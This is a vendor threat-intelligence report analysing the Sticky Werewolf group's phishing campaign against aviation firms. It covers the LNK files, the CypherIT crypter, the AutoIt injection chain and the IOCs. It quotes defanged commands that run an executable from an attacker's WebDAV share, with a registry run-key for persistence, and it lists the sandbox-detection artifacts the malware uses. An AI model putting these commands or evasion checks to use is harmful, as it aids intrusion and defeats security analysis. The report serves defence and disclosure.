Morphisec Labs has been monitoring increased activity associated with Sticky Werewolf, a group suspected to have geopolitical and/or hacktivist ties. While the group’s geographical origin and home base remain unclear, recent attack techniques suggest espionage and data exfiltration intent.
Introduction
Sticky Werewolf is a cyber threat group first detected in April 2023; early activities primarily targeted public organizations in Russia and Belarus. The group’s operations have since extended to several sectors, targeting a pharmaceutical company, a Russian research institute dealing with microbiology and vaccine development, and more.
In their most recent campaign, Sticky Werewolf have targeted the aviation industry with emails supposedly from the First Deputy General Director of AO OKB Kristall (a Moscow-based company involved in the production and maintenance of aircraft and spacecraft). In previous campaigns the group used phishing emails with links to malicious files. This latest campaign used archive files containing LNK files pointing to a payload stored on WebDAV servers.
Infection Chain
In previous campaigns, the infection chain began with phishing emails containing a link to download a malicious file from platforms like gofile.io. However, in their latest campaign, the infection method has changed.
The initial email includes an archive attachment; when the recipient extracts the archive, they find LNK and decoy files. These LNK files point to an executable hosted on a WebDAV server. Once executed, this initiates a Batch script, which then launches an AutoIt script that ultimately injects the final payload.
Technical Analysis
Phishing Email
The phishing email, purportedly sent by the First Deputy General Director and Executive Director of AO OKB Kristall, targets individuals in the aerospace and defense sector.
The email invites recipients to a video conference on future cooperation, providing a password-protected archive that containing a malicious payload, and aims to deceive recipients into opening the harmful attachment under the lure of a legitimate business invitation.
.png?width=871&height=452&name=sticky-werewolf%20(1).png)
Email Attachment
The initial archive delivered in the phishing email contains three files designed to deceive the recipient into executing at least one of the malicious email’s contents.
The archive includes:
- A Decoy PDF File: This file serves as a distraction, providing seemingly legitimate content to reduce suspicion while the LNK files execute the malicious payload.
- Two LNK Files Masquerading as DOCX Documents:
- Повестка совещания.docx.lnk (Meeting agenda): This file is intended to appear as a legitimate document outlining the meeting agenda.
- Список рассылки.docx.lnk (Mailing list): This file is disguised as a document containing the distribution list for the meeting.
The PDF file, included as a decoy in the phishing archive, is an invitation to a video conference organized by AO "OKB Kristall" with key enterprises of the "Russian Helicopters" holding. The conference aims to discuss "Issues of prospective cooperation 2024-2025."
The PDF also references the two malicious LNK files as attachments, increasing the likelihood of the recipient opening them.
- Meeting agenda (Повестка совещания.docx.lnk)
- Mailing list (Список рассылки.docx.lnk)
LNKs
Once the victim clicks the LNK files, the following actions will be triggered:
First LNK - Повестка совещания.docx.lnk (Meeting agenda)
Executes the command which performs multiple actions:
1. Registry Entry for Persistence: Adds a registry entry to run WINWORD.exe from a network share (\\94.156.8[.]166\Microsoft Office Word$\WINWORD.exe) on login.
2. Decoy Message: Displays a message in Russian indicating a document opening error, claiming the file is corrupted.
Second LNK - Список рассылки.docx.lnk (Mailing List)
Executes the command \\document-cdn[.]org\Microsoft Office Word$\WINWORD.exe, which will launch the same executable as in the first LNK file, this time with the domain name resolved by the above IP (at the time of writing).
CypherIT Loader / Crypter
Once the victim clicks the LNK file, the executable from the network share begins running. This executable is an NSIS self-extracting archive which is part of a previously known crypter named CypherIT.
This crypter has been used for several years to deliver malicious payloads in various campaigns by multiple threat actors. While the original CypherIT crypter is no longer being sold, the current executable is a variant of it, as observed in couple of hacking forums.
The NSIS archive extracts its files into the $INTERNET_CACHE directory, which corresponds to %LocalAppData%\Microsoft\Windows\INetCache, and is typically used for Internet Explorer's temporary files. After extraction, the installer runs one of the files, an obfuscated batch script.
Batch Script
This batch script performs several operations:
- Delay Execution: If wrsa.exe or opssvc.exe processes are running, the script delays execution by running ping -n 193 127.0.0.1.
- Change Filenames: If any of the following processes are present: avastui.exe, avgui.exe, nswscsvc.exe, sophoshealth.exe, the script changes the filenames for the next stage AutoIt executable and script file extension.
- File Concatenation: Concatenates multiple files into two files:
- A legitimate AutoIt executable.
- A compiled AutoIt script.
- Execute AutoIt: Runs the AutoIt executable, passing the compiled script as an argument.
|
Process Name |
Vendor |
|
avastui.exe |
AVG Antivirus |
|
avgui.exe |
AVG Antivirus |
|
nswscsvc.exe |
Norton Security |
|
opssvc.exe | sophoshealth.exe |
Sophos Endpoint Protection |
|
wrsa.exe |
Webroot |
Table: Processes monitored by the Batch script and their corresponding security vendors.
AutoIT Script
The executed AutoIT script has various capabilities such as anti-analysis, anti-emulation, persistence, and unhooking. Its main goal is to inject the payload and establish persistence while evading security solutions and analysis attempts.
Anti-Analysis and Anti-Emulation
The script checks for artifacts or signs belonging to security vendors' emulators and environments:
.png?width=937&height=120&name=sticky-werewolf%20(6).png)
|
Artifact-Type |
Value |
Vendor |
|
Computer Name |
tz |
BitDefender Emulator |
|
Computer Name |
NfZtFbPfH |
Kaspersky Emulator |
|
Computer Name |
ELICZ |
AVG Emulator |
|
Username |
test22 |
|
|
Process name |
avastui.exe |
AVG Antivirus |
|
File Name |
C:\aaa_TouchMeNot_.txt |
Windows Defender Emulator |
|
Process Name |
bdagent.exe |
Bitdefender |
|
Process Name |
avp.exe |
Kaspersky |
The script then overrides ntdll.dll by mapping a clean copy from the disk and replacing the .text section of the one loaded — a known technique to remove hooking.
Persistence
Persistence is established via a scheduled task or the startup directory.
Decryption and Injection
Before injecting the payload, it decrypts it using two shellcodes that perform RC4 decryption.
- The first shellcode performs the key scheduling algorithm using the provided passphrase.
- The second shellcode implements the PRGA of the RC4 stream cipher.
.png?width=772&height=478&name=sticky-werewolf%20(7).png)
The decrypted bytes are decompressed using RtlDecompressFragment with COMPRESSION_FORMAT_LZNT1. The final payload is then injected using a process hollowing into a legitimate AutoIT process.
Conclusion
The injected payloads typically include commodity RATs or stealers. Recently, Sticky Werewolf has utilized Rhadamanthys Stealer and Ozone RAT in their campaigns. Previously, the group deployed MetaStealer, DarkTrack, NetWire, among others. These malwares facilitate extensive espionage and data exfiltration.
While there is no definitive evidence pointing to a specific national origin for the Sticky Werewolf group, the geopolitical context suggests possible links to a pro-Ukrainian cyberespionage group or hacktivists, but this attribution remains uncertain.
How Morphisec Helps
Morphisec's Automated Moving Target Defense (AMTD) effectively stops attacks, which typically include commodity RATs or stealers, (like those used by the Sticky Werewolf group) at various stages of the attack chain.
Morphisec doesn’t rely on signature or behavioral patterns. Instead, it uses its patented AMTD technology to prevent the attack at its earliest stages, preemptively blocking attacks on memory and applications, and effectively remediating the need for response.
Schedule a demo today to see how Morphisec stops Sticky Werewolf and other new emerging threats.
IOCs
EXE
- 05880ff0442bbedc8f46076ef56d4d1ffeda68d9ef26b659c4868873fa84c1a9
- 03ee2011ad671b1781015024ea53edfbff92c28c2b123bba02d6a6f462e74105
- 1301ec3006ad03742bfaef047aa434320aa0e725a99be5d6be27b955a814fcf4
LNK
- c3efbac8ebffcf3d8178ce23e59f3b4978f5a91bf93773889870d45cc1b554b0
- ce2b6d3aad07d3dec2b24f676cc9d2022bab5a086c7e773f9cfa3e7b7dc6d66a
Decoy
- 9eddffbef4d9d7329d062db0a93c933104d00f12106bf91fa3b58e8f8b19aa41
- 217196571088cfd63105ae836482d742befcb7db37308ce757162c005a5af6ab
- 3ccbd8bd7424506b26491e5ff5ff55b000adaab1074ccf3b7452d0883f668040
- d6e6c786b793b46a1ee9b18b058e045d0aa1c83aa2b6aa493637f611d654d957
- d973e7854f10b4d0a1060e55022dceadc51d038cee85d05e2c2c2fd3b40a42be
C2
- 79.132.128[.]47
- 94.156.8[.]166
- document-cdn[.]org
- 94.156.8[.]211
.png?width=571&height=160&name=iso27001-(2).png)